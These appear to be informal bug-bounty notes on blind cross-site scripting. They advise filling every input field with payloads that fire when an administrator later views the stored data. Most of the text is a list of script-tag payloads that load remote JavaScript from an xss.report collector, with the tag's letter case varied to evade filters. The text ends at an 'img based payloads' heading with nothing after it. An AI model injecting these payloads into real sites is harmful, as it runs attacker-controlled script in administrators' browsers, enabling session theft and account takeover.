Entry points for Blind xss, fill every possible field with blind xss payload.

https://xss.report

use payloads from the above website.

The payload must be stored in the database and also reflect in the dom.

Even after we enterred the payload in the field we wont get the alert popup until the admin checks the page, even if the field is vulnerable to dom xss.

since we coulndt know whether developer is using htmlspeical chars or not we have to use different payload combinations using burpsuite or try adding payloads manually.

blind xss payloads

script based payloads

'"><script src=https://xss.report/c/nok1></script>
'"><Script src=https://xss.report/c/nok1></Script>
'"><sCript src=https://xss.report/c/nok1></sCript>
'"><SCript src=https://xss.report/c/nok1></SCript>
'"><scRipt src=https://xss.report/c/nok1></scRipt>
'"><ScRipt src=https://xss.report/c/nok1></ScRipt>
'"><sCRipt src=https://xss.report/c/nok1></sCRipt>
'"><SCRipt src=https://xss.report/c/nok1></SCRipt>
'"><scrIpt src=https://xss.report/c/nok1></scrIpt>
'"><ScrIpt src=https://xss.report/c/nok1></ScrIpt>
'"><sCrIpt src=https://xss.report/c/nok1></sCrIpt>
'"><SCrIpt src=https://xss.report/c/nok1></SCrIpt>
'"><scRIpt src=https://xss.report/c/nok1></scRIpt>
'"><ScRIpt src=https://xss.report/c/nok1></ScRIpt>
'"><sCRIpt src=https://xss.report/c/nok1></sCRIpt>
'"><SCRIpt src=https://xss.report/c/nok1></SCRIpt>
'"><scriPt src=https://xss.report/c/nok1></scriPt>
'"><ScriPt src=https://xss.report/c/nok1></ScriPt>
'"><sCriPt src=https://xss.report/c/nok1></sCriPt>
'"><SCriPt src=https://xss.report/c/nok1></SCriPt>
'"><scRiPt src=https://xss.report/c/nok1></scRiPt>
'"><ScRiPt src=https://xss.report/c/nok1></ScRiPt>
'"><sCRiPt src=https://xss.report/c/nok1></sCRiPt>
'"><SCRiPt src=https://xss.report/c/nok1></SCRiPt>
'"><scrIPt src=https://xss.report/c/nok1></scrIPt>
'"><ScrIPt src=https://xss.report/c/nok1></ScrIPt>
'"><sCrIPt src=https://xss.report/c/nok1></sCrIPt>
'"><SCrIPt src=https://xss.report/c/nok1></SCrIPt>
'"><scRIPt src=https://xss.report/c/nok1></scRIPt>
'"><ScRIPt src=https://xss.report/c/nok1></ScRIPt>
'"><sCRIPt src=https://xss.report/c/nok1></sCRIPt>
'"><SCRIPt src=https://xss.report/c/nok1></SCRIPt>
'"><scripT src=https://xss.report/c/nok1></scripT>
'"><ScripT src=https://xss.report/c/nok1></ScripT>
'"><sCripT src=https://xss.report/c/nok1></sCripT>
'"><SCripT src=https://xss.report/c/nok1></SCripT>
'"><scRipT src=https://xss.report/c/nok1></scRipT>
'"><ScRipT src=https://xss.report/c/nok1></ScRipT>
'"><sCRipT src=https://xss.report/c/nok1></sCRipT>
'"><SCRipT src=https://xss.report/c/nok1></SCRipT>
'"><scrIpT src=https://xss.report/c/nok1></scrIpT>
'"><ScrIpT src=https://xss.report/c/nok1></ScrIpT>
'"><sCrIpT src=https://xss.report/c/nok1></sCrIpT>
'"><SCrIpT src=https://xss.report/c/nok1></SCrIpT>
'"><scRIpT src=https://xss.report/c/nok1></scRIpT>
'"><ScRIpT src=https://xss.report/c/nok1></ScRIpT>
'"><sCRIpT src=https://xss.report/c/nok1></sCRIpT>
'"><SCRIpT src=https://xss.report/c/nok1></SCRIpT>
'"><scriPT src=https://xss.report/c/nok1></scriPT>
'"><ScriPT src=https://xss.report/c/nok1></ScriPT>
'"><sCriPT src=https://xss.report/c/nok1></sCriPT>
'"><SCriPT src=https://xss.report/c/nok1></SCriPT>
'"><scRiPT src=https://xss.report/c/nok1></scRiPT>
'"><ScRiPT src=https://xss.report/c/nok1></ScRiPT>
'"><sCRiPT src=https://xss.report/c/nok1></sCRiPT>
'"><SCRiPT src=https://xss.report/c/nok1></SCRiPT>
'"><scrIPT src=https://xss.report/c/nok1></scrIPT>
'"><ScrIPT src=https://xss.report/c/nok1></ScrIPT>
'"><sCrIPT src=https://xss.report/c/nok1></sCrIPT>
'"><SCrIPT src=https://xss.report/c/nok1></SCrIPT>
'"><scRIPT src=https://xss.report/c/nok1></scRIPT>
'"><ScRIPT src=https://xss.report/c/nok1></ScRIPT>
'"><sCRIPT src=https://xss.report/c/nok1></sCRIPT>
'"><SCRIPT src=https://xss.report/c/nok1></SCRIPT>

img based payloads